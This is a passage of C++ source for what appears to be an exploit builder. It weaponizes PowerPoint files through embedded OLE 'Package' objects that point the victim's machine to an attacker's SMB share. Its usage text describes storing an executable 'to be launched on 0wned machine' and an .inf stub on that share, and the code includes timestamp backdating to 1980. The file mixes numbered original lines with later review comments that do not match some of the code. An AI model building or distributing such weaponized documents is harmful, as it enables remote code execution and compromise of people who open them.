  836. */
  837. CHK_HR(pSlides ->get_Count(&slidesCount) );
  838.  
  839. /* Make sure that slides exist in presentation
  840. */
  841. if (slidesCount == 0) {
  842.  
  843. printf("[-] Failed couse no slides found in presentation\n");
  844.  
  845. CHK_HR(E_FAIL);
  846. }
  847.  
  848. for (long i = 1; i <= slidesCount; i ++) {
  849.  
  850. VariantInitAsLong(varSlideIndex, i);
  851.  
  852. CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );
  853.  
  854. VariantClear( &varSlideIndex );
  855.  
  856. /* Get list of shapes
  857. */
  858. CHK_HR( pSlide ->get_Shapes( &pShapes) );
  859.  
  860. /* Get count of shapes
  861. */
  862. CHK_HR( pShapes ->get_Count(&shapesCount) );
  863.  
  864. /* Verify each shape
  865. */
  866. for (int j = 1; j <= shapesCount; j++) {
  867.  
  868. VariantInitAsLong( varShapeIndex, j);
  869.  
  870. CHK_HR( pShapes ->raw_Item( varShapeIndex, &pShape) );
  871.  
  872. VariantClear( &varShapeIndex );
  873.  
  874. CHK_HR( pShape ->get_AutoShapeType( &shapeType) );
  875.  
  876. if (shapeType == Office::MsoAutoShapeType::msoShapeMixed) {
  877.  
  878. CHK_HR( pShape ->get_OLEFormat(&pOLEFormat) );
  879.  
  880. CHK_HR( pOLEFormat ->get_ProgID( &bstrProgId) );
  881.  
  882. if (wcsicmp( L"Package", bstrProgId) == 0) {
  883.  
  884. *doesHave = true;
  885. }
  886.  
  887. SAFE_FREE_BSTR_BY_REF( &bstrProgId );
  888.  
  889. SAFE_RELEASE_BY_REF( &pOLEFormat );
  890. }
  891.  
  892. SAFE_RELEASE_BY_REF( &pShape );
  893.  
  894. if (*doesHave) {
  895.  
  896. break;
  897. }
  898. }
  899. ///////////
  900.  
  901.  
  902. SAFE_RELEASE_BY_REF( &pShapes );
  903.  
  904. SAFE_RELEASE_BY_REF( &pSlide );
  905.  
  906. if (*doesHave) {
  907.  
  908. break;
  909. }
  910. }
  911.  
  912. bres = true;
  913.  
  914. _Done:
  915.  
  916. VariantClear( &varShapeIndex );
  917.  
  918. VariantClear( &varSlideIndex );
  919.  
  920. SAFE_FREE_BSTR_BY_REF( &bstrProgId );
  921.  
  922. SAFE_RELEASE_BY_REF( &pOLEFormat );
  923.  
  924. SAFE_RELEASE_BY_REF( &pShape );
  925.  
  926. SAFE_RELEASE_BY_REF( &pShapes );
  927.  
  928. SAFE_RELEASE_BY_REF( &pSlide );
  929.  
  930. SAFE_RELEASE_BY_REF( &pSlides );
  931.  
  932. return bres;
  933. }
  934.  
  935. bool change_file_time(wchar_t *fname) {
  936.  
  937. SYSTEMTIME systemTime = {0};
  938. HANDLE hFile = INVALID_HANDLE_VALUE;
  939. FILETIME fileTime = {0};
  940.  
  941. GetSystemTime( &systemTime);
  942.  
  943. systemTime.wYear = 1980;
  944. systemTime.wMonth = 1;
  945. systemTime.wDay = 1;
  946. systemTime.wHour = 15;
  947. systemTime.wMinute = 0;
  948. systemTime.wSecond = 0;
  949.  
  950. hFile = \
  951. CreateFileW(
  952. fname,
  953. FILE_WRITE_ATTRIBUTES,
  954. FILE_SHARE_READ | FILE_SHARE_WRITE,
  955. NULL,
  956. OPEN_EXISTING,
  957. FILE_ATTRIBUTE_NORMAL,
  958. NULL
  959. );
  960.  
  961. if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {
  962.  
  963. return false;
  964. }
  965.  
  966. SystemTimeToFileTime( &systemTime, &fileTime);
  967.  
  968. SetFileTime( hFile, &fileTime, &fileTime, &fileTime);
  969.  
  970. CloseHandle(hFile);
  971.  
  972. return true;
  973. }
  974.  
/*++
Copies `fnameData` into the `ppt\embeddings` directory of the OOXML
package `fnameZip` through the Shell.Application automation object:
IShellDispatch::NameSpace is opened on the path inside the archive and
Folder::CopyHere performs the copy. FOF_NO_UI suppresses the shell's
progress and confirmation dialogs.

Returns true once CopyHere has been issued. Nothing here waits on the
copy itself; the Sleep(1000) presumably gives the shell time to finish.
A failing HRESULT is routed by CHK_HR (macro defined earlier in the file)
to the `_Done` label, where the acquired interfaces are released.

NOTE(review): the BSTRs stored in varDir/varFile are owned by _bstr_t
temporaries that are destroyed at the end of their statements, not by the
VARIANTs; that is presumably why the VariantClear calls are commented out.

NOTE(review): for defenders, the observable result of this step is an
additional part under ppt/embeddings/ inside the .pptx/.ppsx container,
which is where OOXML scanners look for embedded OLE packages.
--*/
bool rewrite_embeddings_in_presentation(__in wchar_t *fnameZip, __in wchar_t *fnameData)
/*++
Oh fuck! Stupid Microsoft developers cann't create human-relible
API for zip management. 21st century! WTF? I cann't use IShell
interface for zip management, so use 3rd party zip archivers.
--*/
{

    bool bres = false;
    IShellDispatch *pShell = NULL;
    VARIANT varDir,
    varFile,
    varOption;
    Folder *pFolder = NULL;
    wstring stdWstrDir;


    VariantInit(&varDir);
    VariantInit(&varFile);
    VariantInit(&varOption);

    // Target folder is the embeddings directory inside the archive.
    stdWstrDir.append(fnameZip);
    stdWstrDir.append(L"\\ppt\\embeddings");

    CHK_HR( CoCreateInstance( CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (LPVOID*)&pShell) );


    // BSTR is owned by the _bstr_t temporary, not by varDir.
    varDir.vt = VT_BSTR;
    varDir.bstrVal = _bstr_t(stdWstrDir.c_str());

    CHK_HR( pShell ->NameSpace(varDir, &pFolder) );

    // Same ownership caveat as varDir.
    varFile.vt = VT_BSTR;
    varFile.bstrVal = _bstr_t(fnameData);

    // Suppress the shell copy UI.
    varOption.vt = VT_I4;
    varOption.lVal = FOF_NO_UI;

    CHK_HR( pFolder ->CopyHere( varFile, varOption) );

    // No completion signal is awaited; presumably a grace period for the copy.
    Sleep( 1000 );

    bres = true;


_Done:

    //VariantClear( &varOption );
    //VariantClear( &varFile );
    //VariantClear( &varDir );

    SAFE_RELEASE_BY_REF( &pFolder );

    SAFE_RELEASE_BY_REF( &pShell );

    return bres;
}
  1032.  
/*++
Parses the command line into the caller-provided strings.

Recognised options: -p, -smb, -ef, -eof and -iof each take one value,
which replaces the current content of the corresponding output string;
--force-upload takes no value and sets *bForceUpload. Unrecognised tokens
are skipped silently. A recognised-or-unknown token in the last position
that is not --force-upload is reported as malformed input.

Returns true when all five valued options were seen. Fewer than 11
arguments prints the usage text and returns false (print_usage_and_exit
terminates the process, so the return is not normally reached).
--*/
bool parse_cmd(
    __in int argc,
    wchar_t **argv,
    wstring *fnamePptIn,
    wstring *smbPath,
    wstring *fnameExe,
    wstring *fnameExeOnSmb,
    wstring *fnameInfOnSmb,
    bool *bForceUpload
    )
{
    // Option name -> destination string, plus whether it has been seen.
    struct ValuedOpt {
        const wchar_t *name;
        std::wstring *dest;
        bool seen;
    };
    ValuedOpt valued[] = {
        { L"-p",   fnamePptIn,    false },
        { L"-smb", smbPath,       false },
        { L"-ef",  fnameExe,      false },
        { L"-eof", fnameExeOnSmb, false },
        { L"-iof", fnameInfOnSmb, false },
    };

    // Five valued options need at least ten arguments after argv[0].
    if (argc < 11) {

        print_usage_and_exit(argv[0]);

        return false;
    }

    for (int idx = 1; idx < argc; ++idx) {

        const std::wstring opt(argv[idx]);

        if (opt == L"--force-upload") {

            *bForceUpload = true;

            continue;
        }

        // Every other option must be followed by a value.
        if (idx + 1 >= argc) {

            printf("[-] ERROR: malformed input\n");

            return false;
        }

        for (ValuedOpt &vo : valued) {
            if (opt == vo.name) {
                vo.dest->assign(argv[idx + 1]);
                vo.seen = true;
                ++idx;  // consume the value
                break;
            }
        }
        // Anything else is ignored.
    }

    for (const ValuedOpt &vo : valued) {
        if (!vo.seen) {

            printf("[-] ERROR: Not all options specified\n");

            return false;
        }
    }

    return true;
}
  1154.  
/*++
Prints the usage text for this tool to stdout, with `exe` substituted for
the program name, and terminates the process with exit code 0. It never
returns, so any code after a call to it is unreachable.

NOTE(review): one fragment of the literal below (" that specified things
exist ...") lacks the L prefix. C++11 defines such a mixed concatenation
as a wide literal; older compilers may reject it.

NOTE(review): %s is paired with a wchar_t* here, which is what the MSVC
CRT expects in wprintf; the C standard's spelling for a wide string
argument is %ls.
--*/
void print_usage_and_exit(wchar_t *exe) {

    wprintf(
    L" **************************************************************** \n"
    L"[?] Usage: %s [option|[option]...] \n"
    L" **************************************************************** \n"
    L" options: \n"
    L" -p - path to input PowerPoint presentation file; \n"
    L" -smb - UNC path on remote server in which files should be \n"
    L" placed, f.e: \\\\192.168.3.100\\public ; \n"
    L" -ef - path to executable file to be launched on 0wned \n"
    L" machine; content of file 'll be stored into -eof \n"
    L" file; \n"
    L" -eof - name of file into which -ef file's content to be \n"
    L" stored; exploit uploads this file onto -smb path \n"
    L" automatically; make sure that -eof file is located \n"
    L" on remote server before exploitation phase; \n"
    L" -iof - name of .inf file to be stored on remote server; \n"
    L" exploit extracts .inf stub from self and stores into \n"
    L" file on remote host automatically; make sure that \n"
    L" this file exists on remote server before exploitation \n"
    L" phase; \n"
    L" --force-upload \n"
    L" - specifies explicit file's uploading to remote server; \n"
    L" **************************************************************** \n"
    L" EXAMPLE: \n"
    L" -p a.pptx -smb \\\\192.168.0.1\\public -ef E:\\stub.exe \\ \n"
    L" -eof Config.xml -iof Preview.inf --force-upload \n"
    L" creates a.pptx.saved.ppsx file from a.pptx; \n"
    L" stores stub.exe into \\\\192.168.0.1\\public\\Config.xml; \n"
    L" stores .inf stub into \\\\192.168.0.1\\public\\Preview.inf; \n"
    L" **************************************************************** \n"
    L" NOTES: \n"
    L" -smb, -iof, -eof are written into presentations, so make sure \n"
    " that specified things exist in real life; \n"
    L" **************************************************************** \n",
    exe);

    // Does not return.
    ExitProcess(0);
}
  1195.  
  1196. /* EOF
  1197. */